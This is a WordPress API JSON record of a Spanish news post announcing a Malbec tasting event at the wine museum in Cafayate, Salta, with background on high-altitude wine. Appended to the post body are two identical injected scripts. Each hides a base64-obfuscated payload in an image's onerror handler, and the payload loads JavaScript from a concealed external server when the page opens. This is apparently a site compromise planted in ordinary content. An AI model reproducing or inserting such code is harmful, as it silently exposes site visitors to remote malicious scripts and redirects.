{"id":3896,"date":"2024-03-26T09:46:43","date_gmt":"2024-03-26T12:46:43","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3896"},"modified":"2025-08-13T23:57:42","modified_gmt":"2025-08-14T02:57:42","slug":"celebracion-del-malbec-de-altura-en-el-museo-de-la-vid-y-el-vino-de-cafayate","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3896","title":{"rendered":"Celebraci\u00f3n del Malbec de Altura en el Museo de la Vid y el Vino de Cafayate"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background has-link-color wp-elements-9ceb31d9b77ba83ab8c32746ccda81e1\"><em>M\u00e1s de 30 bodegas dar\u00e1n a degustar sus productos destacando al Malbec y a su tipicidad inigualable que aporta el Valle Calchaqu\u00ed a la cepa que nos representa en el mundo.<\/em><\/h3>\n\n\n\n<p>Un a\u00f1o m\u00e1s, la&nbsp;<strong>Secretar\u00eda de Cultura&nbsp;<\/strong>de la Provincia celebra el Malbec de Altura. En el Museo de la Vid y el Vino, junto con Bodegas de Salta y la Municipalidad de Cafayate, se vivir\u00e1 un evento \u00fanico.<\/p>\n\n\n\n<p>Para ello, se convoc\u00f3 &nbsp;a las grandes bodegas, bodegas artesanales y peque\u00f1os productores para reunirlos en una \u00fanica actividad, que tendr\u00e1 lugar el s\u00e1bado 30 de marzo, a las 19 hs.<\/p>\n\n\n\n<p>M\u00e1s de 30 bodegas dar\u00e1n a degustar sus productos destacando al Malbec y a su tipicidad inigualable que aporta el Valle Calchaqu\u00ed a la cepa que nos representa en el mundo.<\/p>\n\n\n\n<p>Adem\u00e1s, se realizar\u00e1 la presentaci\u00f3n del libro digital \u00abCEPAS\u00bb &nbsp;realizado por el Museo de la Vid y el Vino y se exhibir\u00e1 la primera muestra fotogr\u00e1fica del banco de im\u00e1genes del &nbsp;Museo \u00abMOMENTOS\u00bb, realizada por Victoria Quiroga.<\/p>\n\n\n\n<p>La m\u00fasica en vivo tambi\u00e9n formar\u00e1 parte del evento, con un recital del artista Alexis Carral, revelaci\u00f3n de Serenata 2024.<\/p>\n\n\n\n<p>Costo de la entrada: $7.000. Venta anticipada desde el martes 26 de marzo, en boleter\u00eda del Museo de la Vid y el Vino, Avenida G\u00fcemes Sur esquina Ferm\u00edn Perdiguero \u2013 Cafayate Salta de 9 a 18 hs.<\/p>\n\n\n\n<p><strong>Sobre el Malbec<\/strong><\/p>\n\n\n\n<p>El Malbec no solo es la cepa insignia de Argentina, sino que ha logrado convertirse en sin\u00f3nimo del pa\u00eds, un embajador en el mundo que dot\u00f3 de un car\u00e1cter pujante a la industria vitivin\u00edcola argentina durante los \u00faltimos veinte a\u00f1os.<\/p>\n\n\n\n<p>En la provincia de Salta, en el Valle Calchaqu\u00ed, donde vive el sol, se elaboran los vinos Malbec &nbsp;m\u00e1s altos el mundo (Colom\u00e9 est\u00e1 registrada como la bodega m\u00e1s alta del planeta en los Records Guinness y en donde se registraron las primeras vides de Malbec de la Argentina). Las vides de Malbec est\u00e1n plantadas entre 1700 a 3100 msnm. Esta altura tan marcada es lo que les da su sello diferencial a los Malbec de Salta. Debido a la amplitud &nbsp;t\u00e9rmica tan pronunciada entre el d\u00eda y la noche, que llega hasta 20\u00b0 de diferencia, &nbsp;se hace m\u00e1s lenta la maduraci\u00f3n de la uva &nbsp;favoreciendo &nbsp;la acumulaci\u00f3n de aromas y sabores frutales.<\/p>\n\n\n\n<p>Durante el d\u00eda, por la mayor cercan\u00eda al sol y los cielos di\u00e1fanos, la radiaci\u00f3n es mayor, lo que favorece una mejor fotos\u00edntesis, con el resultado de un mejor color, mayor acidez, m\u00e1s aroma y mejor sabor. Podemos decir que los Vinos de Altura tienen m\u00e1s de todo.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/celebracion-del-malbec-de-altura-en-el-museo-de-la-vid-y-el-vino-de-cafayate-94814\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>M\u00e1s de 30 bodegas dar\u00e1n a degustar sus productos destacando al Malbec y a su tipicidad inigualable que aporta el Valle Calchaqu\u00ed a la cepa que nos representa en el mundo. Un a\u00f1o m\u00e1s, la&nbsp;Secretar\u00eda de Cultura&nbsp;de la Provincia celebra el Malbec de Altura. En el Museo de la Vid y el Vino, junto con [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3897,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[24],"tags":[],"class_list":{"0":"post-3896","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-bodegas"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3896"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3896"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3896\/revisions"}],"predecessor-version":[{"id":6811,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3896\/revisions\/6811"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3897"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3896"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3896"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3896"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}